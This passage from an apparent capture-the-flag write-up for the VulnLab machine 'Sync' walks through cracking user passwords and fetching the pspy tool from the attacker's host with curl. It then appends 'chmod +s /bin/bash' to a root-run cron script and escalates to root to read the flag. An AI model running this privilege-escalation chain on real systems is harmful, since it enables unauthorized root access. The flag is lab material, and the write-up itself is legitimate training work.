Cost 2 (algorithm specific iterations) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
sakura           (sa)     
gerald           (jennifer)     
gerald           (triss)
...

Now we switch to sa user:

jennifer@ip-10-10-200-238:/dev/shm/backup/tmp/backup$ su sa
Password: 
sa@ip-10-10-200-238:/dev/shm/backup/tmp/backup$ id
uid=1001(sa) gid=1001(sa) groups=1001(sa)

Check the SUDO privileges:

sa@ip-10-10-200-238:/dev/shm/backup/tmp/backup$ sudo -l
[sudo] password for sa: 
Sorry, user sa may not run sudo on ip-10-10-200-238.

Always nothing … sniff (>.<)'

Privilege escalation (Sync_Root)

Search all files owned by sa:

sa@ip-10-10-200-238:~$ find / -user sa 2>/dev/null | grep -v '/proc'
/home/sa
/home/sa/.bashrc
/home/sa/.profile
/home/sa/.bash_logout
/usr/local/bin/backup.sh

Found backup.sh

Read it:

sa@ip-10-10-200-238:~$ cat /usr/local/bin/backup.sh
#!/bin/bash

mkdir -p /tmp/backup
cp -r /opt/httpd /tmp/backup
cp /etc/passwd /tmp/backup
cp /etc/shadow /tmp/backup
cp /etc/rsyncd.conf /tmp/backup
zip -r /backup/$(date +%s).zip /tmp/backup
rm -rf /tmp/backup
sa@ip-10-10-200-238:~$

This script is used to create backups

Set a local web server:

$ python3 -m http.server 80                                             
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

Upload pspy to our target:

sa@ip-10-10-200-238:/tmp$ curl 10.8.4.253/pspy64 -o p

Then execute it:

sa@ip-10-10-200-238:/tmp$ chmod +x p
sa@ip-10-10-200-238:/tmp$ ./p -f
pspy - version: v1.2.1 - Commit SHA: f9e6a1590a4312b9faa093d8dc84e19567977a6d


     ██▓███    ██████  ██▓███ ▓██   ██▓
    ▓██░  ██▒▒██    ▒ ▓██░  ██▒▒██  ██▒
    ▓██░ ██▓▒░ ▓██▄   ▓██░ ██▓▒ ▒██ ██░
    ▒██▄█▓▒ ▒  ▒   ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
    ▒██▒ ░  ░▒██████▒▒▒██▒ ░  ░ ░ ██▒▓░
    ▒▓▒░ ░  ░▒ ▒▓▒ ▒ ░▒▓▒░ ░  ░  ██▒▒▒ 
    ░▒ ░     ░ ░▒  ░ ░░▒ ░     ▓██ ░▒░ 
    ░░       ░  ░  ░  ░░       ▒ ▒ ░░  
                   ░           ░ ░     
                               ░ ░     

Config: Printing events (colored=true): processes=true | file-system-events=true ||| Scanning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
2025/01/11 07:05:08 CMD: UID=1001  PID=4546   | ./p -f 
2025/01/11 07:05:08 CMD: UID=0     PID=4517   | 
2025/01/11 07:05:08 CMD: UID=0     PID=4477   | 
2025/01/11 07:05:08 CMD: UID=1001  PID=4457   | bash 
2025/01/11 07:05:08 CMD: UID=0     PID=4456   | su sa 
2025/01/11 07:05:08 CMD: UID=0     PID=4432   | 
2025/01/11 07:05:08 CMD: UID=0     PID=3907   | 
2025/01/11 07:05:08 CMD: UID=1004  PID=3788   | bash 
2025/01/11 07:05:08 CMD: UID=0     PID=3787   | su jennifer 
2025/01/11 07:05:08 CMD: UID=0     PID=3733   | 
2025/01/11 07:05:08 CMD: UID=1003  PID=3691   | -bash 
2025/01/11 07:05:08 CMD: UID=1003  PID=3685   | sshd: triss@pts/0                                                                                                                                             
2025/01/11 07:05:08 CMD: UID=1003  PID=3597   | (sd-pam) 
2025/01/11 07:05:08 CMD: UID=1003  PID=3596   | /lib/systemd/systemd --user 
2025/01/11 07:05:08 CMD: UID=0     PID=3593   | sshd: triss [priv]                                                                                                                                            
2025/01/11 07:05:08 CMD: UID=0     PID=3550   | 
2025/01/11 07:05:08 CMD: UID=33    PID=3011   | /usr/sbin/apache2 -k start 
2025/01/11 07:05:08 CMD: UID=33    PID=2459   | /usr/sbin/apache2 -k start 
2025/01/11 07:05:08 CMD: UID=33    PID=700    | /usr/sbin/apache2 -k start 
2025/01/11 07:05:08 CMD: UID=33    PID=699    | /usr/sbin/apache2 -k start 
2025/01/11 07:05:08 CMD: UID=33    PID=698    | /usr/sbin/apache2 -k start 
2025/01/11 07:05:08 CMD: UID=33    PID=697    | /usr/sbin/apache2 -k start 
2025/01/11 07:05:08 CMD: UID=33    PID=696    | /usr/sbin/apache2 -k start 
2025/01/11 07:05:08 CMD: UID=0     PID=619    | /usr/libexec/polkitd --no-debug 
2025/01/11 07:05:08 CMD: UID=0     PID=607    | /usr/sbin/apache2 -k start 
2025/01/11 07:05:08 CMD: UID=0     PID=594    | /usr/bin/python3 /usr/share/unattended-upgrades/unattended-upgrade-shutdown --wait-for-signal 
2025/01/11 07:05:08 CMD: UID=114   PID=584    | /usr/sbin/chronyd -F 1 
2025/01/11 07:05:08 CMD: UID=114   PID=583    | /usr/sbin/chronyd -F 1 
2025/01/11 07:05:08 CMD: UID=0     PID=570    | sshd: /usr/sbin/sshd -D -o AuthorizedKeysCommand /usr/share/ec2-instance-connect/eic_run_authorized_keys %u %f -o AuthorizedKeysCommandUser ec2-instance-connect [listener] 0 of 10-100 startups 
2025/01/11 07:05:08 CMD: UID=0     PID=530    | /sbin/agetty -o -p -- \u --noclear tty1 linux 
2025/01/11 07:05:08 CMD: UID=0     PID=528    | /sbin/agetty -o -p -- \u --keep-baud 115200,57600,38400,9600 ttyS0 vt220 
2025/01/11 07:05:08 CMD: UID=0     PID=525    | /usr/sbin/vsftpd /etc/vsftpd.conf 
2025/01/11 07:05:08 CMD: UID=0     PID=519    | /lib/systemd/systemd-logind 
2025/01/11 07:05:08 CMD: UID=0     PID=518    | /usr/lib/snapd/snapd 
2025/01/11 07:05:08 CMD: UID=104   PID=515    | /usr/sbin/rsyslogd -n -iNONE 
2025/01/11 07:05:08 CMD: UID=0     PID=514    | /usr/bin/rsync --daemon --no-detach 
2025/01/11 07:05:08 CMD: UID=0     PID=513    | /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers 
2025/01/11 07:05:08 CMD: UID=102   PID=506    | @dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only 
2025/01/11 07:05:08 CMD: UID=0     PID=505    | /usr/sbin/cron -f -P 
2025/01/11 07:05:08 CMD: UID=0     PID=500    | /usr/sbin/acpid 
2025/01/11 07:05:08 CMD: UID=100   PID=463    | /lib/systemd/systemd-networkd 
2025/01/11 07:05:08 CMD: UID=101   PID=393    | /lib/systemd/systemd-resolved 
2025/01/11 07:05:08 CMD: UID=0     PID=234    | 
2025/01/11 07:05:08 CMD: UID=0     PID=208    | /lib/systemd/systemd-udevd 
2025/01/11 07:05:08 CMD: UID=0     PID=206    | /sbin/multipathd -d -s 
2025/01/11 07:05:08 CMD: UID=0     PID=205    | 
2025/01/11 07:05:08 CMD: UID=0     PID=203    | 
2025/01/11 07:05:08 CMD: UID=0     PID=202    | 
2025/01/11 07:05:08 CMD: UID=0     PID=201    | 
2025/01/11 07:05:08 CMD: UID=0     PID=165    | /lib/systemd/systemd-journald 
2025/01/11 07:05:08 CMD: UID=0     PID=126    | 
2025/01/11 07:05:08 CMD: UID=0     PID=125    | 
...
2025/01/11 07:06:01 CMD: UID=0     PID=4556   | /bin/bash /usr/local/bin/backup.sh 
2025/01/11 07:06:01 CMD: UID=0     PID=4555   | /bin/sh -c /usr/local/bin/backup.sh 
2025/01/11 07:06:01 CMD: UID=0     PID=4554   | /usr/sbin/CRON -f -P 
...

Found that /usr/local/bin/backup.sh is executed by root

Our user sa has write permission to this shell script, so we have many ways to pwn it and become root (add a reverse shell, add a new root account…).

We will add chmod +s /bin/bash to obtain a SUID bash then escalate to root:

sa@ip-10-10-200-238:/tmp$ echo "chmod +s /bin/bash" >> /usr/local/bin/backup.sh

Double check:

sa@ip-10-10-200-238:/tmp$ cat /usr/local/bin/backup.sh
#!/bin/bash

mkdir -p /tmp/backup
cp -r /opt/httpd /tmp/backup
cp /etc/passwd /tmp/backup
cp /etc/shadow /tmp/backup
cp /etc/rsyncd.conf /tmp/backup
zip -r /backup/$(date +%s).zip /tmp/backup
rm -rf /tmp/backup
chmod +s /bin/bash

Now we just need to wait a few times that script will be execute again by root.

Then check if our modification has been done correctly:

sa@ip-10-10-200-238:/tmp$ ls -la /bin/bash
-rwsr-sr-x 1 root root 1396520 Jan  6  2022 /bin/bash

Confirmed SUID Bash

Then escalate to root to grab the flag Sync_Root:

sa@ip-10-10-200-238:/tmp$ bash -p
bash-5.1# id
uid=1001(sa) gid=1001(sa) euid=0(root) egid=0(root) groups=0(root),1001(sa)
bash-5.1# cat /root/root.txt
VL{1ce8506d2bec0abb03177353db237e1b}

Extra

Challenge solved! Use this link to share it: https://api.vulnlab.com/api/v1/share?id=4c45d809-2086-49a0-a57c-dce6348c58ba

SYNC

Gerald, Triss and Jennifer are 3 main characters of the game/anime/drama: The Witcher.

medium-the-witcher-triss-merigold-geralt-of-rivia-yennefer-of-original-imagagtr9jmem7rx

The-Witcher-Feature-1024x743